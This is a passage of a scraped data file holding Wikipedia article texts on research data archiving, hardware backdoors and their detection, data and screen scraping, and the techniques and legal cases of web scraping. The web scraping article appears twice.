collect and archive data: The data collected by tropical biologists are often long-term, complex, and expensive to collect. The Board of Editors of Biotropica strongly encourages authors who re-use data archives archived data sets to include as fully engaged collaborators the scientists who originally collected them. We feel this will greatly enhance the quality and impact of the resulting research by drawing on the data collector’s profound insights into the natural history of the study system, reducing the risk of errors in novel analyses, and stimulating the cross-disciplinary and cross-cultural collaboration and training for which the ATBC and Biotropica are widely recognized. NB: Biotropica is one of only two journals that pays the fees for authors depositing data at Dryad. The American Naturalist requires authors to deposit the data associated with accepted papers in a public archive. For gene sequence data and phylogenetic trees, deposition in GenBank or TreeBASE, respectively, is required. There are many possible archives that may suit a particular data set, including the Dryad repository for ecological and evolutionary biology data. All accession numbers for GenBank, TreeBASE, and Dryad must be included in accepted manuscripts before they go to Production. If the data is deposited somewhere else, please provide a link. If the data is culled from published literature, please deposit the collated data in Dryad for the convenience of your readers. Any impediments to data sharing should be brought to the attention of the editors at the time of submission so that appropriate arrangements can be worked out. 4 The primary data underlying the conclusions of an article are critical to the verifiability and transparency of the scientific enterprise, and should be preserved in usable form for decades in the future. For this reason, Journal of Heredity requires that newly reported nucleotide or amino acid sequences, and structural coordinates, be submitted to appropriate public databases (e.g., GenBank; the EMBL Nucleotide Sequence Database; DNA Database of Japan; the Protein Data Bank; and Swiss-Prot). Accession numbers must be included in the final version of the manuscript. For other forms of data (e.g., microsatellite genotypes, linkage maps, images), the Journal endorses the principles of the Joint Data Archiving Policy (JDAP) in encouraging all authors to archive primary datasets in an appropriate public archive, such as Dryad, TreeBASE, or the Knowledge Network for Biocomplexity. Authors are encouraged to make data publicly available at time of publication or, if the technology of the archive allows, opt to embargo access to the data for a period up to a year after publication. The American Genetic Association also recognizes the vast investment of individual researchers in generating and curating large datasets. Consequently, we recommend that this investment be respected in secondary analyses or meta-analyses in a gracious collaborative spirit. Molecular Ecology expects that data supporting the results in the paper should be archived in an appropriate public archive, such as GenBank, Gene Expression Omnibus, TreeBASE, Dryad, the Knowledge Network for Biocomplexity, your own institutional or funder repository, or as Supporting Information on the Molecular Ecology web site. Data are important products of the scientific enterprise, and they should be preserved and usable for decades in the future. Authors may elect to have the data publicly available at time of publication, or, if the technology of the archive allows, may opt to embargo access to the data for a period up to a year after publication. Exceptions may be granted at the discretion of the editor, especially for sensitive information such as human subject data or the location of endangered species. Such material must be hosted on an accredited independent site (URL and accession numbers to be provided by the author), or sent to the Nature journal at submission, either uploaded via the journal's online submission service, or if the files are too large or in an unsuitable format for this purpose, on CD DVD (five copies). Such material cannot solely be hosted on an author's personal or institutional web site. 7 Nature requires the reviewer to determine if all of the supplementary data and methods have been archived. The policy advises reviewers to consider several questions, including: "Should the authors be asked to provide supplementary methods or data to accompany the paper online? (Such data might include source code for modelling studies, detailed experimental protocols or mathematical derivations.) Science supports the efforts of databases that aggregate published data for the use of the scientific community. Therefore, before publication, large data sets (including microarray data, protein or DNA sequences, and atomic coordinates or electron microscopy maps for macromolecular structures) must be deposited in an approved database and an accession number provided for inclusion in the published paper. 9 "Materials and methods" Science now requests that, in general, authors place the bulk of their description of materials and methods online as supporting material, providing only as much methods description in the print manuscript as is necessary to follow the logic of the text. (Obviously, this restriction will not apply if the paper is fundamentally a study of a new method or technique.) To allow others to verify and build on the work published in Royal Society journals, it is a condition of publication that authors make available the data, code and research materials supporting the results in the article. Datasets and code should be deposited in an appropriate, recognised, publicly available repository. Where no data-specific repository exists, authors should deposit their datasets in a general repository such as Dryad (repository) or Figshare. The Journal of Archaeological Science has had a data disclosure policy since at least 2013. Their policy states that 'all data relating to the article must be made available in Supplementary files or deposited in external repositories and linked to within the article. The policy recommends that data are deposited in a repository such as the Archaeology Data Service, the Digital Archaeological Record, or PANGAEA. A 2018 study found a data availability rate of 53%, reflecting either weak enforcement of this policy or an incomplete understanding among editors, reviewers, and authors of how to interpret and implement this policy. 12 In the United States, the National Science Foundation (NSF) has tightened requirements on data archiving. Researchers seeking funding from NSF are now required to file a data management plan as a two-page supplement to the grant application. 13 The NSF Datanet initiative has resulted in funding of the Data Observation Network for Earth (DataONE) project, which will provide scientific data archiving for ecological and environmental data produced by scientists worldwide. DataONE's stated goal is to preserve and provide access to multi-scale, multi-discipline, and multi-national data. The community of users for DataONE includes scientists, ecosystem managers, policy makers, students, educators, and the public. The German DFG requires that research data should be archived in the researcher's own institution or an appropriate nationwide infrastructure for at least 10 years. 14 The British Digital Curation Centre maintains an overview of funder's data policies. 15 Research data is archived in data libraries or data archives. A data library, data archive, or data repository is a collection of numeric and or geospatial data sets for secondary use in research. A data library is normally part of a larger institution (academic, corporate, scientific, medical, governmental, etc.). established for research data archiving and to serve the data users of that organisation. The data library tends to house local data collections and provides access to them through various means (CD DVD-ROMs or central server for download). A data library may also maintain subscriptions to licensed data resources for its users to access the information. Whether a data library is also considered a data archive may depend on the extent of unique holdings in the collection, whether long-term preservation services are offered, and whether it serves a broader community (as national data archives do). Most public data libraries are listed in the Registry of Research Data Repositories. In August 2001, the Association of Research Libraries (ARL) published a report 16 presenting results from a survey of ARL member institutions involved in collecting and providing services for numeric data resources. Library service providing support at the institutional level for the use of numerical and other types of datasets in research. Amongst the support activities typically available: The following list refers to scientific data archives. In the social sciences, data libraries are referred to as data archives. 17 Data archives are professional institutions for the acquisition, preparation, preservation, and dissemination of social and behavioral data. Data archives in the social sciences evolved in the 1950s and have been perceived as an international movement: By 1964 the International Social Science Council (ISSC) had sponsored a second conference on Social Science Data Archives and had a standing Committee on Social Science Data, both of which stimulated the data archives movement. By the beginning of the twenty-first century, most developed countries and some developing countries had organized formal and well-functioning national data archives. In addition, college and university campuses often have data libraries' that make data available to their faculty, staff, and students; most of these bear minimal archival responsibility, relying for that function on a national institution (Rockwell, 2001, p. 3227). 18 |
276 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Hardware_backdoor | Hardware backdoors are backdoors in hardware, such as code inside hardware or firmware of computer chips. 1 The backdoors may be directly implemented as hardware Trojans in the integrated circuit. Hardware backdoors are intended to undermine security in smartcards and other cryptoprocessors unless investment is made in anti-backdoor design methods. 2 They have also been considered for car hacking. 3 Hardware backdoors are considered to be highly problematic for several reasons. 1 For instance, they cannot be removed by conventional means such as antivirus software. They can also circumvent other types of security, such as disk encryption. Lastly, they can also be injected during production where the user has no control. Skorobogatov has developed a technique capable of detecting malicious insertions into chips. 9 New York University Tandon School of Engineering researchers have developed a way to corroborate a chip's operation using verifiable computing whereby "manufactured for sale" chips contain an embedded verification module that proves the chip's calculations are correct and an associated external module validates the embedded verification module. 8 Another technique developed by researchers at University College London (UCL) relies on distributing trust between multiple identical chips from disjoint supply chains. Assuming that at least one of those chips remains honest the security of the device is preserved. 20 Researchers at the University of Southern California Ming Hsieh Department of Electrical and Computer Engineering and the Photonic Science Division at the Paul Scherrer Institute have developed a new technique called Ptychographic X-ray laminography. 21 This technique is the only current method that allows for verification of the chips blueprint and design without destroying or cutting the chip. It also does so in significantly less time than other current methods. Anthony F. J. Levi Professor of electrical and computer engineering at University of Southern California explains “It’s the only approach to non-destructive reverse engineering of electronic chips— and not just reverse engineering but assurance that chips are manufactured according to design. You can identify the foundry, aspects of the design, who did the design. It’s like a fingerprint. 21 This method currently is able to scan chips in 3D and zoom in on sections and can accommodate chips up to 12 millimeters by 12 millimeters easily accommodating an Apple A12 chip but not yet able to scan a full Nvidia Volta GPU. 21 "Future versions of the laminography technique could reach a resolution of just 2 nanometers or reduce the time for a low-resolution inspection of that 300 by 300 micrometer segment to less than an hour, the researchers say. 21 |
277 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Screen_scraping | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
278 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-29 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
279 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#Legal_issues | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage 